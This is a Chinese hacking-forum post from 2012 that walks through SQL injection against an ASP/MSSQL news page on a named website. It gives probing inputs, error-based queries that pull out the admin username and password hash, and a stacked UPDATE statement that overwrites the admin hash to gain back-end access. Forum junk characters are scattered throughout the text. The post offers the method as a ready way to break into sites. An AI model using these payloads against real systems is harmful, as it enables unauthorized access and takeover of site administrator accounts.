经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
. b$ i; x" m( b可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)! j6 e; X+ ~' D7 Z: P. f
测试如下:
! e% ]" I0 M* D( d0 Ihttp://www.tmdsb.com/news.asp?id=1211 U) a, A, f5 o l, Q3 N
在地址后输入单引号,显示- A; L6 v/ a3 r7 d7 H; r5 v3 x$ L
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’7 _) Y1 c# M* d' ~
字符串 ’’’ 之前有未闭合的引号
# | C( Z8 d. y/news/tmdws.asp,行63' e/ B! B- u4 y+ V8 ^0 W
说明没有过滤单引号且数据库是MSSQL.5 E5 p# t+ K& y% K2 U
and 1=1正常。and 1=2出错。肯定存在注入
$ o& \( j" V8 D8 w5 `# a接着输入
* V8 I* Z. K9 c8 W) E+ T% ^% Yhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)/ O! {0 U% f- y* f4 J; o
得到帐号为:admin1 ~0 }3 N! k5 @! ]. y' i
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
, ^0 a+ O, O! u2 r0 r得到密码为:a4716077c2ba075c
' G# @; H. g7 b9 @% c0 q9 d接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
& N1 `7 @ L. \# C命令如下 :
3 k, N+ u& E- `% l9 d, w;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
7 Q0 p2 n# o/ e9 T5 Q这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41